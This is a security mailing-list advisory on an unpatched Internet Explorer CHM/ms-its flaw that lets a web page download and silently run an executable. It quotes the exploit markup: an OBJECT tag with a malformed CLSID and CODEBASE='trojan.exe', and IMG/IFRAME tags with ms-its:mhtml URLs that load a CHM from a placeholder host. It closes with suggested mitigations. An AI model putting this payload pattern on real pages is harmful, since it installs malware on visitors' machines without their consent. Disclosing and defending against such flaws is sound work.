Microsoft Internet Explorer Unspecified CHM File Processing Arbitrary Code Execution Vulnerability (bid 9658)

[K-OTiK Security <Special-Alerts@xxxxxxxxxx>]

hi,

Thor Larholm reported a new unpatched and critical IE vuln wich is exploited as 
an infection vector for malicious codes and trojans (bid 9658)...

here are some details regarding this bug, from Berman Enconado of TrendMicro - 
(more details will be released by Thor)

The exploit allows executable files to be downloaded and run in the background 
without user intervention. It employs a malformed CLSID parameter, which 
enables it to execute a file on the infected user's machine. When an infected 
user visits a Web site, it can cause a possible malicious executable file to 
run on the system without user permission. 

The exploit works by tagging another script, which contains a CLASSID exploit 
as a CHM. The following is an illustration of how this exploit works: 

The file, LAUNCH.HTML, contains the following codes, which utilizes the 
exploit: 

<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' 
CODEBASE='trojan.exe'>

To execute the script (LAUNCH.HTML) as a CHM, another script tags and calls 
LAUNCH.HTML using the following: 

<IMG 
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
 
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
 
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME
 
SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>


Solutions : 
1)disable the execution of CHM files ? (Windows Explorer/Tools/Folder 
Options/File Types/CHM ..)
2)rename registry entry ? HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its
3)use another product ? :-/
4)wait for a patch ? (how long ?)


Cheers.
Isabelle - Security Engineer
K-OTik Security Staff
http://www.k-otik.com